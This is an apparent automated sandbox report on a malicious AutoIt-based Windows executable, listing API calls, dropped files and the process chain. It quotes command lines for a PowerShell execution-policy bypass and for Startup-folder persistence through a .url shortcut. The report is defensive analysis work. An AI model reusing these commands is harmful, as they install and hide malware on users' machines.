Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF6BB1B0D24
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF6BB1B0D24
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_005A4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00914830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00914830
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF6BB1B0A6C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB121CEC GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00007FF6BB121CEC
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_005BD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0092D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0092D164

System Summary

barindex
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF6BB1237B0
Source: T6l6gPxwQU.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5e6fb49a-f
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_b81c1be3-9
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19C054: CreateFileW,DeviceIoControl,CloseHandle,0_2_00007FF6BB19C054
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_00007FF6BB18D2C4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF6BB19D750
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00595778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_00595778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00905778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00905778
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1BF6300_2_00007FF6BB1BF630
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB132E300_2_00007FF6BB132E30
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB133C200_2_00007FF6BB133C20
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB13FA4F0_2_00007FF6BB13FA4F
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1CDB180_2_00007FF6BB1CDB18
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB15793C0_2_00007FF6BB15793C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB12B9F00_2_00007FF6BB12B9F0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A1A180_2_00007FF6BB1A1A18
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1CBA0C0_2_00007FF6BB1CBA0C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B206C0_2_00007FF6BB1B206C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB14C1300_2_00007FF6BB14C130
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB125F3C0_2_00007FF6BB125F3C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB12BE700_2_00007FF6BB12BE70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB14BEB40_2_00007FF6BB14BEB4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB12B3900_2_00007FF6BB12B390
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB16529C0_2_00007FF6BB16529C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B32AC0_2_00007FF6BB1B32AC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB12183C0_2_00007FF6BB12183C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1618400_2_00007FF6BB161840
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19D87C0_2_00007FF6BB19D87C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1358D00_2_00007FF6BB1358D0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB14F8D00_2_00007FF6BB14F8D0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1517500_2_00007FF6BB151750
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1D17C00_2_00007FF6BB1D17C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B56A00_2_00007FF6BB1B56A0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1595B00_2_00007FF6BB1595B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB162D200_2_00007FF6BB162D20
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B6C340_2_00007FF6BB1B6C34
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB122AE00_2_00007FF6BB122AE0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1C0AEC0_2_00007FF6BB1C0AEC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1530DC0_2_00007FF6BB1530DC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB130E700_2_00007FF6BB130E70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB140E900_2_00007FF6BB140E90
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1CCE8C0_2_00007FF6BB1CCE8C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB166DE40_2_00007FF6BB166DE4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1584C00_2_00007FF6BB1584C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1445140_2_00007FF6BB144514
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B83600_2_00007FF6BB1B8360
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A83D40_2_00007FF6BB1A83D4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB14C3FC0_2_00007FF6BB14C3FC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1624000_2_00007FF6BB162400
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1402C40_2_00007FF6BB1402C4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B63200_2_00007FF6BB1B6320
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB15A8A00_2_00007FF6BB15A8A0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1667F00_2_00007FF6BB1667F0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1CC6D40_2_00007FF6BB1CC6D4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1C055C0_2_00007FF6BB1C055C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1CA59C0_2_00007FF6BB1CA59C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E211D1_2_00007FFD9B7E211D
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0053B0203_2_0053B020
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005394E03_2_005394E0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00539C803_2_00539C80
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005523F53_2_005523F5
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005B84003_2_005B8400
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005665023_2_00566502
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0056265E3_2_0056265E
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0053E6F03_2_0053E6F0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055282A3_2_0055282A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005689BF3_2_005689BF
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00566A743_2_00566A74
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005B0A3A3_2_005B0A3A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00540BE03_2_00540BE0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055CD513_2_0055CD51
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0058EDB23_2_0058EDB2
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00598E443_2_00598E44
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005B0EB73_2_005B0EB7
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00566FE63_2_00566FE6
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005533B73_2_005533B7
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0054D45D3_2_0054D45D
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055F4093_2_0055F409
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005316633_2_00531663
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0054F6283_2_0054F628
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005516B43_2_005516B4
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0053F6A03_2_0053F6A0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005578C33_2_005578C3
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055DBA53_2_0055DBA5
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00551BA83_2_00551BA8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00569CE53_2_00569CE5
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0054DD283_2_0054DD28
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055BFD63_2_0055BFD6
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00551FC03_2_00551FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008AB02010_2_008AB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008A94E010_2_008A94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008A9C8010_2_008A9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C23F510_2_008C23F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0092840010_2_00928400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008D650210_2_008D6502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008AE6F010_2_008AE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008D265E10_2_008D265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C282A10_2_008C282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008D89BF10_2_008D89BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00920A3A10_2_00920A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008D6A7410_2_008D6A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008B0BE010_2_008B0BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008FEDB210_2_008FEDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CCD5110_2_008CCD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00920EB710_2_00920EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00908E4410_2_00908E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008D6FE610_2_008D6FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C33B710_2_008C33B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CF40910_2_008CF409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008BD45D10_2_008BD45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008AF6A010_2_008AF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C16B410_2_008C16B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008BF62810_2_008BF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008A166310_2_008A1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C78C310_2_008C78C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C1BA810_2_008C1BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CDBA510_2_008CDBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008D9CE510_2_008D9CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008BDD2810_2_008BDD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C1FC010_2_008C1FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CBFD610_2_008CBFD6
Source: Joe Sandbox ViewDropped File: C:\Users\Public\InformationCheck.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 008B1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 008C0D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 008C8B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exeCode function: String function: 00550D17 appears 70 times
Source: C:\Users\Public\InformationCheck.exeCode function: String function: 00558B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exeCode function: String function: 00541A36 appears 34 times
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: String function: 00007FF6BB148D58 appears 76 times
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs T6l6gPxwQU.exe
Source: T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs T6l6gPxwQU.exe
Source: classification engineClassification label: mal100.expl.evad.winEXE@12/10@3/1
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A3778 GetLastError,FormatMessageW,0_2_00007FF6BB1A3778
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF6BB18D5CC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB18CCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF6BB18CCE0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00588DE9 AdjustTokenPrivileges,CloseHandle,3_2_00588DE9
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00589399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_00589399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008F8DE9 AdjustTokenPrivileges,CloseHandle,10_2_008F8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_008F9399
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_00007FF6BB1A59D8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF6BB19BE00
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1B7E38 CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00007FF6BB1B7E38
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB126580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF6BB126580
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeFile created: C:\Users\Public\InformationCheck.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mibvk1qm.s2r.ps1Jump to behavior
Source: T6l6gPxwQU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: T6l6gPxwQU.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\T6l6gPxwQU.exe "C:\Users\user\Desktop\T6l6gPxwQU.exe"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
